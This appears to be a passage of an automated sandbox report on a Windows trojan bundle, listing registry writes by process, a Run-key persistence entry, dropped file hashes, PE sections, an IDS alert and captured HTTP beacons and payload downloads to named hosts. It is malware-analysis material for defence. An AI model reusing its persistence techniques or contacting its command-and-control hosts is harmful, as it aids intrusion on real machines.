[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 09 35 66 49 82 C4 B6 06 8B 85 05 2C 1E B8 CE"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level"

The process nst6.tmp.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\CalendarTool\QUIT]
"QuitSession" = "{0A3A8827-4F83-49DA-9BB3-1E089656E7AC}-1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 AE 47 DD 19 BB A4 13 6E DE A7 71 AB E9 3B F7"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process CalendarServ.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "11665867"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"CtrlBitMap" = "00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 F0 57 68 43 87 DA 97 3C 50 9C 21 7B C7 3B 8D"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"LastTime" = "DD 07 02 00 04 00 0E 00 00 00 37 00 2F 00 4E 00"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level"

The process CalendarServ.exe:3156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 14 96 58 67 41 95 FE A7 81 FB 51 2E 1E 13 10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 45 65 90 9A E8 C2 71 59 26 A1 F2 1D 50 4D F2"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level"

The process %original file name%.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 8C 0D 80 C2 D3 53 35 30 EA 5C ED D1 F0 F7 60"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The process rundll32.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 3E 9C E2 0A 29 4F 57 B5 73 9E 76 B4 F6 BB DF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880" = "Internet Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"

The process setup.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D7 F5 33 3D DF 65 5C AB A2 6D 5A AF 6D C0 7B"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"

The process setup.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D2 CB 94 B8 DC 70 D4 E9 9C 81 6D C4 B7 FD 52"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKCU\Software\YeaInstaller]
"TmN" = "51486"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process Calendar.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 0F BF 8E E9 62 87 0D FD B2 6B B4 CC 3F 9B CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process 291734.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 E9 B4 94 AC 7E 2F E5 91 4F E3 E6 87 51 84 4D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\DtsEncodeTools]
"{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}" = "{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
41079c5f52bdaae924b668f58848f7ea c:\Documents and Settings\"%CurrentUserName%"\Application Data\YeaPlayer_br_IBD_Bundle.exe
41079c5f52bdaae924b668f58848f7ea c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe
9202f096accb0e5dabc4de57365a1bf4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\setup.exe
d847ccf62c349453393ec8042ffddd95 c:\Program Files\CalendarTool\2.0.0.11189\CalendarEntry.dll
63bbff06febbdf113c94c426396430c8 c:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe
598c72aba0b2afc46f1b85b8ffa003e3 c:\Program Files\CalendarTool\2.0.0.11189\CrashReport.exe
4a42c7920e2c2978d862544832b967ab c:\Program Files\CalendarTool\2.0.0.11189\CrashUL.exe
a5a91a90602dc58562c8c311e1e8b019 c:\Program Files\CalendarTool\2.0.0.11189\EVPDR.dll
326fa0636ae763210d7d6e2cc5619be8 c:\Program Files\CalendarTool\2.0.0.11189\EVPHelp.dll
2064fea63e5501e2cde3af77de07e1ab c:\Program Files\CalendarTool\2.0.0.11189\EVPKernel.dll
6aa6f72365d13397f8d9e6cb5e8707fd c:\Program Files\CalendarTool\2.0.0.11189\EVPNet.dll
73e5bd50fd3af7a7a24a73bf279282f0 c:\Program Files\CalendarTool\2.0.0.11189\EVPTask.dll
4cfc9da8e06cdf64e411759b6eb82ab8 c:\Program Files\CalendarTool\2.0.0.11189\InstallHelper.exe
b8f50f062002e67901b134ae536907e9 c:\Program Files\CalendarTool\2.0.0.11189\Report.exe
c56db1a95947290eedea6fb6b7b5267a c:\Program Files\CalendarTool\2.0.0.11189\calendar.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 24124 24576 4.45853 1a13b408c917b27c9106545148d3b8d3
.rdata 28672 4714 5120 3.46982 921acf8cb0aea87c0603fa899765fcc2
.data 36864 154936 1536 2.97482 797517c6ef57aa95d53df2cf07568953
.ndata 192512 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 225280 48696 49152 4.32483 23edce385f432ed492f596e7da74f1f9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Abnormal User-Agent No space after colon - Likely Hostile

Traffic

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

GET /yeaplayer_br.encrypt HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.thedesktopweather.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:00 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1157.v0-mow ( h0-s1063.v0-mow), ms h0-s1063.v0-mow ( h0-s75.p51-icn), ht-d h0-s75.p51-icn.cdngp.net
ETag: "769c03b-f6-529cfae03b180"
Cache-Control: max-age=604800
Expires: Thu, 05 May 2016 20:26:06 GMT
Age: 365394
Content-Length: 246
Content-Type: text/plain
Last-Modified: Thu, 21 Jan 2016 03:27:18 GMT
Connection: keep-alive


POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGQzc4RjI1RDExOEU4MTVCNERBQzVDRjM5MEMzMjlCMDM3RTBERTg3QjA3NTQ2ODMyRTQ1NjUyQjkxQzNFQkUyNDJEQTgyMjJCMDJFNzk5Q0Y5MkI2MTE0MTMwNjhBRDBDQkE5RDRGQ0ExMUNFOTc5RUNGRkYwRkE1NUU3QzU2N0ZCOTc0QzA5MjgwNzkzQ0FBMDBFNjk2OUI3NTdBMUFF HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030

POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNDlERjNDNUIyNjgwNjZGRDczQzBCMjQzQjg2RTMzNUIxMkYwQzU4NzY3NzQxQTNDNjc3MEM4M0JFRjlEMkZCNUEyRDA1RTU0OThBQ0Q2QTg2NjlDRTkyMDEyMjkwNzg5 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
